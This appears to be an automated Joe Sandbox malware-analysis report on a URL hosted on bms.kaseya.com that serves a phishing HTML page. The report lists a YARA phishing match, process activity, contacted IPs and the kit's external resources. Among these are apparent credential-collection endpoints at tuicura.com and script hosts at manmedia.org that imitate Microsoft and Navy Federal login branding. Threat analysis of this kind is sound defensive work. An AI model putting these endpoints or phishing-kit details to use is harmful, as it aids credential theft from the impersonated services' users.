Loading ...

Play interactive tourEdit tour

Analysis Report https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d

Overview

General Information

Sample URL:https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d
Analysis ID:356753
Infos:

Most interesting Screenshot:

Detection

HTMLPhisher
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish_10

Classification

Startup

  • System is w10x64
  • iexplore.exe (PID: 5116 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4696 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6480 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 6544 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4568 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6264 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].htmlJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partialJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      Phishing:

      barindex
      Yara detected HtmlPhish_10Show sources
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial, type: DROPPED

      Compliance:

      barindex
      Uses new MSVCR DllsShow sources
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
      Uses secure TLS version for HTTPS connectionsShow sources
      Source: unknownHTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49744 version: TLS 1.2
      Source: unknownDNS traffic detected: queries for: bms.kaseya.com
      Source: actions[1].js.6.drString found in binary or memory: http://logo.clearbit.com/
      Source: popper.min[1].js.6.drString found in binary or memory: http://opensource.org/licenses/MIT).
      Source: style[1].css.6.drString found in binary or memory: https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.s
      Source: style[1].css.6.drString found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-2ivja-xubozxczt8hkuyvxiwoa4vmtaxu-16djdwpc4/logintenantbrand
      Source: style[1].css.6.drString found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-bo8shd6svfocawg-d1lkuqyily-ch6cw-n5c0rmtwbq/logintenantbrand
      Source: style[1].css.6.drString found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logintenantbrandi
      Source: style[1].css.6.drString found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logintenantbrand
      Source: style[1].css.6.drString found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-pglwtvfgjxd-jsxdxcu-ixstqem6dnqipplqonbe8ro/logintenantbrand
      Source: style[1].css.6.drString found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-uhsmbqxf0i-fc4inz9zgqi96xh-agvghl3xbkxk-y7c/logintenantbrand
      Source: style[1].css.6.drString found in binary or memory: https://aadcdn.msftauthimg.net/dbd5a2dd-xs-ly6aik51q1xmokwuzg7cgil517bv-ngigbudd-ua/logintenantbrand
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
      Source: GetFile[1].htm.3.drString found in binary or memory: https://bms.kaseya.com/media/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWd
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://code.jquery.com/jquery-3.3.1.slim.min.js
      Source: bootstrap.min[1].js.6.drString found in binary or memory: https://getbootstrap.com/)
      Source: bootstrap.min[1].js.6.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
      Source: bootstrap.min[1].js.6.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
      Source: actions[1].js.6.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://manmedia.org/offic/n.page/actions.js
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://manmedia.org/offic/n.page/jqueryLib.js
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://manmedia.org/offic/n.page/style.css
      Source: style[1].css.6.drString found in binary or memory: https://my.navyfederal.org/NFOAA_Auth/resources/img/css/img-billboard-BG.svg);
      Source: style[1].css.6.drString found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-daldttgld72orokijcgtjn9zgk-dhdwrgaphu-0dqka/log
      Source: style[1].css.6.drString found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logi
      Source: style[1].css.6.drString found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/log
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/cdnbundles/converged.v2.login.m
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://tuicura.com/offic/next2.php
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://tuicura.com/offic/nexxt.php
      Source: 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://www.google.com/s2/favicons?sz=16&domain_url=
      Source: actions[1].js.6.dr, 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://www.google.com/s2/favicons?sz=32&domain_url=
      Source: actions[1].js.6.dr, 46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drString found in binary or memory: https://www.google.com/s2/favicons?sz=64&domain_url=
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.6:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.6:49744 version: TLS 1.2
      Source: classification engineClassification label: mal48.phis.win@11/32@9/5
      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{835A355E-7633-11EB-90E5-ECF4BB2D2496}.datJump to behavior
      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF08A6A974461167F6.TMPJump to behavior
      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2
      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html
      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2
      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2
      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 356753 URL: https://bms.kaseya.com/Comm... Startdate: 23/02/2021 Architecture: WINDOWS Score: 48 36 Yara detected HtmlPhish_10 2->36 7 iexplore.exe 5 59 2->7         started        process3 process4 9 iexplore.exe 28 7->9         started        13 iexplore.exe 1 58 7->13         started        dnsIp5 26 origin-bms.kaseya.com 52.144.52.222, 443, 49719, 49720 STRATOGENGB United States 9->26 28 bms.kaseya.com 9->28 22 46f3fddd-165c-4cd8...tml.a41uhm1.partial, HTML 9->22 dropped 24 46f3fddd-165c-4cd8...36cd19deef5[1].html, HTML 9->24 dropped 15 iexplore.exe 40 13->15         started        18 iexplore.exe 27 13->18         started        20 iexplore.exe 27 13->20         started        file6 process7 dnsIp8 30 manmedia.org 204.93.216.87, 443, 49737, 49738 SERVERCENTRALUS United States 15->30 32 cs1100.wpc.omegacdn.net 152.199.23.37, 443, 49744, 49745 EDGECASTUS United States 15->32 34 6 other IPs or domains 15->34

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d0%Avira URL Cloudsafe

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://manmedia.org/offic/n.page/actions.js0%Avira URL Cloudsafe
      https://aadcdn.msftauthimg.net/dbd5a2dd-xs-ly6aik51q1xmokwuzg7cgil517bv-ngigbudd-ua/logintenantbrand0%Avira URL Cloudsafe
      https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/log0%Avira URL Cloudsafe
      https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.s0%Avira URL Cloudsafe
      https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/cdnbundles/converged.v2.login.m0%Avira URL Cloudsafe
      https://aadcdn.msftauthimg.net/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logintenantbrand0%Avira URL Cloudsafe
      https://tuicura.com/offic/next2.php0%Avira URL Cloudsafe
      https://aadcdn.msftauthimg.net/dbd5a2dd-2ivja-xubozxczt8hkuyvxiwoa4vmtaxu-16djdwpc4/logintenantbrand0%Avira URL Cloudsafe
      https://manmedia.org/offic/n.page/jqueryLib.js0%Avira URL Cloudsafe
      https://aadcdn.msftauthimg.net/dbd5a2dd-pglwtvfgjxd-jsxdxcu-ixstqem6dnqipplqonbe8ro/logintenantbrand0%Avira URL Cloudsafe
      https://aadcdn.msftauthimg.net/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logintenantbrandi0%Avira URL Cloudsafe
      https://aadcdn.msftauthimg.net/dbd5a2dd-uhsmbqxf0i-fc4inz9zgqi96xh-agvghl3xbkxk-y7c/logintenantbrand0%Avira URL Cloudsafe
      https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logi0%Avira URL Cloudsafe
      https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-daldttgld72orokijcgtjn9zgk-dhdwrgaphu-0dqka/log0%Avira URL Cloudsafe
      https://tuicura.com/offic/nexxt.php0%Avira URL Cloudsafe
      https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai70%Avira URL Cloudsafe
      https://aadcdn.msftauthimg.net/dbd5a2dd-bo8shd6svfocawg-d1lkuqyily-ch6cw-n5c0rmtwbq/logintenantbrand0%Avira URL Cloudsafe
      https://manmedia.org/offic/n.page/style.css0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      cs1100.wpc.omegacdn.net
      152.199.23.37
      truefalse
        unknown
        cdnjs.cloudflare.com
        104.16.19.94
        truefalse
          high
          origin-bms.kaseya.com
          52.144.52.222
          truefalse
            high
            manmedia.org
            204.93.216.87
            truefalse
              unknown
              stackpath.bootstrapcdn.com
              unknown
              unknownfalse
                high
                bms.kaseya.com
                unknown
                unknownfalse
                  high
                  code.jquery.com
                  unknown
                  unknownfalse
                    high
                    aadcdn.msftauth.net
                    unknown
                    unknownfalse
                      unknown
                      ajax.aspnetcdn.com
                      unknown
                      unknownfalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        0true
                          low

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://manmedia.org/offic/n.page/actions.js46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://aadcdn.msftauthimg.net/dbd5a2dd-xs-ly6aik51q1xmokwuzg7cgil517bv-ngigbudd-ua/logintenantbrandstyle[1].css.6.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                            high
                            https://my.navyfederal.org/NFOAA_Auth/resources/img/css/img-billboard-BG.svg);style[1].css.6.drfalse
                              high
                              https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logstyle[1].css.6.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.sstyle[1].css.6.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://login.microsoftonline.com/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201actions[1].js.6.drfalse
                                high
                                https://code.jquery.com/jquery-3.3.1.slim.min.js46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                                  high
                                  https://bms.kaseya.com/media/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdGetFile[1].htm.3.drfalse
                                    high
                                    https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/cdnbundles/converged.v2.login.m46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://aadcdn.msftauthimg.net/dbd5a2dd-pd-rbmzbvqe7c-fjbigunke9t2gf5jszgqrgsatxfkk/logintenantbrandstyle[1].css.6.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://getbootstrap.com/)bootstrap.min[1].js.6.drfalse
                                      high
                                      https://tuicura.com/offic/next2.php46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://aadcdn.msftauthimg.net/dbd5a2dd-2ivja-xubozxczt8hkuyvxiwoa4vmtaxu-16djdwpc4/logintenantbrandstyle[1].css.6.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://manmedia.org/offic/n.page/jqueryLib.js46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://aadcdn.msftauthimg.net/dbd5a2dd-pglwtvfgjxd-jsxdxcu-ixstqem6dnqipplqonbe8ro/logintenantbrandstyle[1].css.6.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                                        high
                                        https://aadcdn.msftauthimg.net/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logintenantbrandistyle[1].css.6.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/twbs/bootstrap/graphs/contributors)bootstrap.min[1].js.6.drfalse
                                          high
                                          https://aadcdn.msftauthimg.net/dbd5a2dd-uhsmbqxf0i-fc4inz9zgqi96xh-agvghl3xbkxk-y7c/logintenantbrandstyle[1].css.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-mg0l7zcxfhbgphoiomweiqgq-z4rxnrzczncff4igy/logistyle[1].css.6.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://logo.clearbit.com/actions[1].js.6.drfalse
                                            high
                                            https://github.com/twbs/bootstrap/blob/master/LICENSE)bootstrap.min[1].js.6.drfalse
                                              high
                                              https://secure.aadcdn.microsoftonline-p.com/dbd5a2dd-daldttgld72orokijcgtjn9zgk-dhdwrgaphu-0dqka/logstyle[1].css.6.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://tuicura.com/offic/nexxt.php46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                                                high
                                                http://opensource.org/licenses/MIT).popper.min[1].js.6.drfalse
                                                  high
                                                  https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai746f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://aadcdn.msftauthimg.net/dbd5a2dd-bo8shd6svfocawg-d1lkuqyily-ch6cw-n5c0rmtwbq/logintenantbrandstyle[1].css.6.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://manmedia.org/offic/n.page/style.css46f3fddd-165c-4cd8-9412-436cd19deef5[1].html.3.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  204.93.216.87
                                                  unknownUnited States
                                                  23352SERVERCENTRALUSfalse
                                                  152.199.23.37
                                                  unknownUnited States
                                                  15133EDGECASTUSfalse
                                                  52.144.52.222
                                                  unknownUnited States
                                                  50292STRATOGENGBfalse
                                                  104.16.19.94
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:31.0.0 Emerald
                                                  Analysis ID:356753
                                                  Start date:23.02.2021
                                                  Start time:16:01:11
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 5m 2s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Cookbook file name:browseurl.jbs
                                                  Sample URL:https://bms.kaseya.com/Common/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:27
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal48.phis.win@11/32@9/5
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • TCP Packets have been reduced to 100
                                                  • Excluded IPs from analysis (whitelisted): 13.64.90.137, 23.211.6.115, 104.43.193.48, 168.61.161.212, 88.221.62.148, 209.197.3.24, 209.197.3.15, 152.199.19.160, 216.58.212.170, 142.250.185.164, 51.11.168.160, 152.199.19.161, 2.20.142.209, 2.20.142.210, 51.103.5.186, 52.155.217.156, 92.122.213.247, 92.122.213.194, 20.54.26.129, 184.30.20.56
